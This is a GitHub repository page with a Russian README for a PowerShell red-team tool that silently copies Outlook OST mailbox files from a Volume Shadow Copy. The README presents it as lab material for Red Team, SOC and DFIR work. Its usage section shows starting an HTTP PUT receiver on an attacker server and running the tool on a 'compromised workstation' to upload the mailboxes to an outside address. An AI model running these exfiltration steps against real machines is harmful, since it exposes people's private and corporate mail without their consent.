Skip to content
/ Copy-OstFromTheShadowCopy Public

powershell-инструмент для съёма ost без остановки outlook через shadow copy. учебный сценарий для red team, soc и dfir: поиск ящиков, vss-снимок, копирование ost и (опционально) эксфиль по http put. использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.

2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ghe770mvp/Copy-OstFromTheShadowCopy

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Copy-OstFromTheShadowCopy.ps1
Copy-OstFromTheShadowCopy.ps1
 
 
README.md
README.md
 
 
put_server.py
put_server.py
 
 

Repository files navigation

Copy-OstFromTheShadowCopy

Powershell-инструмент для съёма ost без остановки outlook через shadow copy. Учебный сценарий для Red Team, SOC и DFIR: поиск ящиков, vss-снимок, копирование ost и (опционально) эксфильтрация по HTTP. Использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.

Copy-OstFromTheShadowCopy

Лабораторный инструмент для тихого съёма Outlook OST-файлов через Volume Shadow Copy на Windows.

Зачем

Цель инструмента — показать, что при наличии прав локального администратора на рабочей станции атакующий может:

  • создать теневую копию тома (VSS),
  • незаметно скопировать OST-файлы Outlook, не останавливая сам Outlook и не трогая залоченный файл,
  • при необходимости выгрузить копии OST на внешний веб сервер методом PUT,
  • разобрать содержимое почты уже оффлайн, на своём хосте.

Это не инструмент для «ломать домены»: он не трогает LSASS, не делает DCSync и не работает с паролями домена.
Задача — показать тихую эксфильтрацию корпоративной переписки и дать материал для Red Team, SOC и DFIR.

Внимание: использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.

Возможности

  • Поиск всех файлов *.ost под C:\Users\*\AppData\Local\Microsoft\Outlook\.
  • Создание одной Volume Shadow Copy для указанного тома (по умолчанию C:\).
  • Монтирование shadow copy в каталог через mklink /d (без прямой работы с GLOBALROOT).
  • Копирование каждого найденного OST из снапшота в артефакт-директорию: C:\LabArtifacts\OST\<HOST>\<User>\<MailboxFile>.ost.ost2.
  • Опциональная загрузка OST-копий на внешний HTTP-сервер методом PUT.
  • Автоматическая очистка: удаление mount-папки и shadow copy (если не включён -KeepShadow).

Применение

На сервере атакующего разворачиваем веб-сервер

python put_server.py --host 0.0.0.0 --port 8000 --outdir ./uploads

На скомпроментированной рабочей станции под управлением Windows

$headers = @{ 'X-RT-Token' = 'lab-demo' }

Copy-OstFromTheShadowCopy `
    -DestinationRoot 'C:\LabArtifacts\OST' `
    -UploadUrl 'http://10.10.10.10:8000' `
    -UploadHeaders $headers

Структура репозитория

Copy-OstFromTheShadowCopy/
├─ Copy-OstFromTheShadowCopy.ps1   # основной скрипт PowerShell
├─ put_server.py                   # минимальный HTTP PUT-ресивер на Python

About

powershell-инструмент для съёма ost без остановки outlook через shadow copy. учебный сценарий для red team, soc и dfir: поиск ящиков, vss-снимок, копирование ost и (опционально) эксфиль по http put. использовать только в своих лабораториях и в рамках авторизованных тестов с письменным разрешением владельца инфраструктуры.

Resources

Readme
Activity

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages